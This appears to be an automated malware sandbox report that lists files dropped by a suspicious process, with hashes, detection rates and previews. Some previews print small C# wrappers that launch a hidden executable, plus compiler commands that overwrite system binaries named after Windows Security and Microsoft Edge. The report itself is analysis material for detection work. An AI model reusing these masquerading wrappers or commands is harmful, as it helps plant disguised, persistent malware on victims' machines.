                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.323856189774723
                                                            Encrypted:false
                                                            SSDEEP:3:6EudY19fnZn:6FYbZ
                                                            MD5:FA3E9203B33E78973E1CC9D3E37D2A95
                                                            SHA1:E92AFFB2AD102D850656BECCC37F84A90168C979
                                                            SHA-256:ABA828AC314E582FE587943CD4538446B0AB6EC50D93A0A818C155C3457E162D
                                                            SHA-512:BF18E2AD16B91FF4D8BDAA1AA18C2B5753C169E8413FA42C344191057054610C3C17D378E155D3C73DE944ECEDF78925515822C2BB4DDBBCC79F1A89B6AF7133
                                                            Malicious:false
                                                            Preview:tlGaDLCnX6c6UEbPSADUZaB1e
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                            Category:dropped
                                                            Size (bytes):367
                                                            Entropy (8bit):4.890181987450651
                                                            Encrypted:false
                                                            SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JaHiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKK
                                                            MD5:69F53655E62666D39407C93C670FC115
                                                            SHA1:581DC75F5842B29E3ED0FFC67AA99172EC9E8DC0
                                                            SHA-256:33BD981472AA1A9C574222B8B9C454FC2ADC7F18F84925526CE303B6191F2CE8
                                                            SHA-512:BE12A6CF991A8D15935F5B6B70E066AB0CED37C755ED58E1801731BC406D32CDC9F4AEFAADE493258B69D7CD0A7F233A44F5670DCC4F00ED9A11A5D4C236F289
                                                            Malicious:false
                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\upfc.exe"); } catch { } }).Start();. }.}.
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):251
                                                            Entropy (8bit):5.018223098522289
                                                            Encrypted:false
                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fAnIpdx:Hu7L//TRq79cQyonIpP
                                                            MD5:CFA27F5CB575B03F4E7E7036E4EFFD33
                                                            SHA1:0413F11113CCA6888BD4EB99BDA2A5E7722BA98D
                                                            SHA-256:5204373591D4D3661D4890AB0FEFE45DD340E85174E22840EBD1440A03104510
                                                            SHA-512:AAEF495067A7A16E2EA1D261984621CC4DF618E86627568AF638CEBD6600698C2760589E17BB9A34469A489D98C230F9814ED219F6A7102D30D7F10961F85481
                                                            Malicious:false
                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.0.cs"
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (322), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):743
                                                            Entropy (8bit):5.236364988688541
                                                            Encrypted:false
                                                            SSDEEP:12:1I/u7L//TRq79cQyonIp2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:1I/un/Vq79tyZQKax5DqBVKVrdFAMBJj
                                                            MD5:4C58110907DF2B05F19DA64345863712
                                                            SHA1:CEC00E25D2A16EC577796A3F9CF962475E2D49A6
                                                            SHA-256:5A7FCC3594F3043E3EE02D625ACAE7BC8690E9DE26EB9000991919642D9BACC7
                                                            SHA-512:76CC7FD98E576EEA1DA3974CE868ED558935BEE5C7CAE2E3E22480ED566C329D90088AC0BD71C4CF5CA8A905295D9B879BAE487501304302F79F4545C1C203A9
                                                            Malicious:false
                                                            Preview:.C:\Browserhost> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                            Category:dropped
                                                            Size (bytes):382
                                                            Entropy (8bit):4.931502418856896
                                                            Encrypted:false
                                                            SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2/t5oeTckufwlxFK8wM2Lnf+eG6L29JaHiFK8wQAv:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLf
                                                            MD5:56FC493D052DD72D651237E55E622F75
                                                            SHA1:F9AC5DB88F60D963DCEB293E0923A17D4414C969
                                                            SHA-256:D69B1AEC2706B399E541A4FE846945233CB728E19BD3537FD39D9AB64F3A495D
                                                            SHA-512:C6869E71C1E09D9D2CCBF99BA351D0EC470F753B284145C06BA255FD02E18B379A364E82E70CA2B01A00D8C9EAB810D67BAE271E221E0C1F7BBEF225D9956EDE
                                                            Malicious:false
                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\upfc.exe"); } catch { } }).Start();. }.}.
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):266
                                                            Entropy (8bit):5.160375182068438
                                                            Encrypted:false
                                                            SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fDQMh:Hu7L//TRRzscQy7QMh
                                                            MD5:EA3D2B03F568AF474AF5EE11F2ACAFA5
                                                            SHA1:5098B16283F61132165EF552717254F16D001B72
                                                            SHA-256:B6E5947934CD3AF01DA0AF560ED07BA9E6B43375DCD0752ADEDEEFCF752FBB5C
                                                            SHA-512:5E262228B17AE170F8B33A990BC0A52AB820764EE96CAF261024433FDBBE458140435B0DBF2FB769C71AA7B62BC4A9295CF7BBFDB5B0AC43F94BCE44CEDE3668
                                                            Malicious:true
                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.0.cs"
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):758
                                                            Entropy (8bit):5.252378629848441
                                                            Encrypted:false
                                                            SSDEEP:12:1I/u7L//TRRzscQy7QMEKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:1I/un/VRzsty7DEKax5DqBVKVrdFAMBt
                                                            MD5:1CC1E098A3146BA96515C4AAE670F4B1
                                                            SHA1:59BE467EEC54657F7AF1EA91CBE17B69A515C386
                                                            SHA-256:6D68E53A68DA57F4F74591B7E5B1AF0BB50EB099957AED3112CE83B63FAA2260
                                                            SHA-512:FBE1D99410C6EC72007B1C5DA9F989DE0D87D26E7329960B696FAD21A8E4A42759FC03922800027DC12926F4CA92BAA4E6F5018C4CBDB8F280BA086426728F05
                                                            Malicious:false
                                                            Preview:.C:\Browserhost> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33280
                                                            Entropy (8bit):5.634433516692816
                                                            Encrypted:false
                                                            SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                            MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                            SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                            SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                            SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38400
                                                            Entropy (8bit):5.699005826018714
                                                            Encrypted:false
                                                            SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                            MD5:87765D141228784AE91334BAE25AD743
                                                            SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                            SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                            SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34816
                                                            Entropy (8bit):5.636032516496583
                                                            Encrypted:false
                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):126976
                                                            Entropy (8bit):6.057993947082715
                                                            Encrypted:false
                                                            SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                            MD5:16B480082780CC1D8C23FB05468F64E7
                                                            SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                            SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                            SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):70144
                                                            Entropy (8bit):5.909536568846014
                                                            Encrypted:false
                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):50176
                                                            Entropy (8bit):5.723168999026349
                                                            Encrypted:false
                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):342528
                                                            Entropy (8bit):6.170134230759619
                                                            Encrypted:false
                                                            SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                            MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                            SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                            SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                            SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38912
